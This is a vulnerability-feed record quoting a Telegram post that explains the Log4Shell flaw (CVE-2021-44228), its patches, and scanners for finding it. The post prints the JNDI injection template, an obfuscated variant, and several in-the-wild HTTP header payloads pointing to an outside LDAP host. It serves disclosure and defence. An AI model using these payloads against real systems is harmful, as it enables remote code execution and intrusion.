{"uuid": "b52baf56-2f10-4874-a6a3-a432690013bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/hacker_trick/555", "content": "The Log4Shell vulnerability\nLast week, version 2.15 of the Log4j logging tool was released to address CVE-2021-44228, disabling only one aspect of the message lookup functionality in JNDI. It then turned out that version 2.15 could still be exploited through certain configurations, but the additional technical details of the flaw were withheld to prevent further exploitation.\n_ Apache acknowledged the flaw again, and therefore disabled all JNDI support by default and removed message lookup handling entirely, and released the second fix, Log4j 2.16, to address the flaw, which was assigned CVE-2021-45046.\n\nHow does the Log4Shell vulnerability work?\nFirst, what are Log4j and JNDI?\nLog4j\nA Java library that serves as a utility widely used in Java programs to log error messages in applications; it is also used in cloud computing services.\n\nJNDI\nA Java API that Log4j uses to retrieve items and objects from remote servers; it can make use of many directory interfaces, including the Lightweight Directory Access Protocol (LDAP) interface, the Domain Name System (DNS), and the (IIOP) protocol.\n\nCause of the flaw\nWhen the message lookup substitution feature is enabled, Log4j detects strings that refer to JNDI resources in configuration sources, log messages, and parameters passed by applications. Because Log4j does not validate the URLs sent in these strings, an attacker can craft malicious requests to applications that use Log4j, replacing messages in fields that contain URLs with malicious servers.\nFor example, in web applications, because HTTP requests are frequently logged, a common attack vector is to place the malicious string in the URL of an HTTP request or in an HTTP header that is frequently logged.\nSuch as:\n ${jndi:[protocol]://[remote server and code address]}\nThe URL set by the attacker is presented as Java object data, and the data is then loaded from that address if it is connected to the internet. By injecting a string that gets logged, the attacker can load and execute malicious code hosted at a public URL, which is executed automatically in memory.\nThere are a variety of obfuscation forms used to prevent detection of scanning or exploitation, such as:\n($ {$ {:: - j} $ {:: - n} $ {:: - d} $ {:: - I})\nSome HTTP headers that researchers observed in a GET request:\nreferer=${jndi:ldap://[redacted].interact.sh}\nx-http-host-override=${jndi:ldap://[redacted].interact.sh}\ntrue-client-ip=${jndi:ldap://[redacted].interact.sh}\nx-forwarded-port=443, x-client-ip=${jndi:ldap://[redacted].interact.sh}\ncf-connecting_ip=${jndi:ldap://[redacted].interact.sh}\nx-forwarded-host=${jndi:ldap://[redacted].interact.sh}\ncontact=${jndi:ldap://[redacted].interact.sh}\n\nResearchers also observed attackers shifting to the RMI API instead of the LDAP protocol interface.\n\nLog4j 2.16.0 _ CVE-2021-45046\nhttps://logging.apache.org/log4j/2.x/security.html\n\nTo scan for and fix Log4Shell vulnerabilities, including log4j 2.15.0, classified under CVE-2021-45046\nhttps://github.com/logpresso/CVE-2021-44228-Scanner\n\nFind vulnerable Log4j2 versions on disk and also inside Java Archive Files\nhttps://github.com/fox-it/log4j-finder", "creation_timestamp": "2021-12-17T00:07:48.000000Z"}